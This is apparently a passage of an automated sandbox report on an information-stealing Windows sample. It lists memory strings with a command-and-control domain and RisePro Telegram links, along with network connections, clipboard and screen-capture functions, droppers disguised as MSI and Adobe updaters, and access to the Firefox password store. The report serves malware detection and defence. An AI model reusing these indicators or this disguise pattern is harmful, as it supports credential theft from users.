                  Source: RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352713016.0000000001346000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456519007.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000BAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/
                  Source: RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/8
                  Source: RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/aibcnf
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2353071644.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352713016.000000000135E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456254141.00000000014D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456519007.0000000001505000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456254141.000000000147C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2499274804.000000000309D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000C36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/api
                  Source: RegAsm.exe, 00000019.00000002.2499274804.000000000309D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/api(
                  Source: RegAsm.exe, 0000000C.00000002.2244993517.000000000114A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/apiO
                  Source: RegAsm.exe, 00000015.00000002.2456519007.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/apiP
                  Source: RegAsm.exe, 00000015.00000002.2456254141.000000000147C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/apiY
                  Source: RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/apih
                  Source: RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/i
                  Source: RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/l
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/pi
                  Source: RegAsm.exe, 00000015.00000002.2456254141.00000000014D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop/s
                  Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2352554407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop:443/api
                  Source: RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://employhabragaomlsp.shop:443/apihrome
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Y
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014AB000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.175
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.175F
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.000000000146E000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, KBHGMwjOItm_DLNJJFRnML7.zip.0.drString found in binary or memory: https://t.me/RiseProSUPPORT
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2154211616.00000000061A6000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.drString found in binary or memory: https://t.me/risepro_bot
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botD
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org#
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                  Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.6:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49720 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49734 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49736 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49738 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49739 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49741 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49742 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49743 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49744 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49745 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49746 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49747 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49750 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49752 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49753 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49755 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49757 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042D5A0 GetWindowLongW,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_0042D5A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042D5A0 GetWindowLongW,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_0042D5A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042D760 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,12_2_0042D760
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00878BB00_2_00878BB0
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_0091AD000_2_0091AD00
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_008BF0D00_2_008BF0D0
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_0095F5500_2_0095F550
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_0082B8E00_2_0082B8E0
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_008A1C100_2_008A1C10
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00965DE00_2_00965DE0
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_008C43200_2_008C4320
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_0086036F0_2_0086036F
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_008A45E00_2_008A45E0
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_009686C00_2_009686C0
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_008747BF0_2_008747BF
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_0085A9280_2_0085A928
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_0085C9600_2_0085C960
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_0090EC400_2_0090EC40
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00A52D3B0_2_00A52D3B
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00966D200_2_00966D20
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00954D400_2_00954D40
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00878E300_2_00878E30
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_008571A00_2_008571A0
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_0084F5800_2_0084F580
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_008C36100_2_008C3610
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_009677600_2_00967760
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeCode function: 0_2_00961F000_2_00961F00
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004F68B87_2_004F68B8
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: 7_2_004F33207_2_004F3320
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00C068B89_2_00C068B8
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: 9_2_00C033209_2_00C03320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043744512_2_00437445
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042645012_2_00426450
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040100012_2_00401000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040617012_2_00406170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004201F012_2_004201F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040318012_2_00403180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004322A012_2_004322A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042434B12_2_0042434B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042033012_2_00420330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041946412_2_00419464
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041648C12_2_0041648C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040F50012_2_0040F500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040465012_2_00404650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042363012_2_00423630
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004016C012_2_004016C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041F6E012_2_0041F6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004087D012_2_004087D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041B7BE12_2_0041B7BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040797012_2_00407970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00439BB012_2_00439BB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00403CD012_2_00403CD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00405CA012_2_00405CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00434D4012_2_00434D40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041EE0012_2_0041EE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041FE0012_2_0041FE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00439ED012_2_00439ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404F9012_2_00404F90
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00EA68B817_2_00EA68B8
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 17_2_00EA332017_2_00EA3320
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00EA68B820_2_00EA68B8
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: 20_2_00EA332020_2_00EA3320
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe 2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe 2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe 2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe 2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
                  Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exeCode function: String function: 00BF4F90 appears 48 times
                  Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exeCode function: String function: 004E4F90 appears 48 times
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: String function: 00E9A6BE appears 42 times
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: String function: 00E94F90 appears 96 times
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeCode function: String function: 00E9F073 appears 34 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408490 appears 57 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408C20 appears 153 times
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 2688
                  Source: tMO4FVIc9l.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: lumma2305[1].exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9894404217479674
                  Source: xq6J5KlULX6jlR3rET0T.exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9894404217479674
                  Source: AdobeUpdaterV202.exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9894404217479674
                  Source: MSIUpdaterV202.exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9894404217479674
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@26/32@3/4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0042D2F0 CoCreateInstance,12_2_0042D2F0
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqliteJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3108
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeFile created: C:\Users\user\AppData\Local\Temp\trixyDxygJpUhAdhwJump to behavior
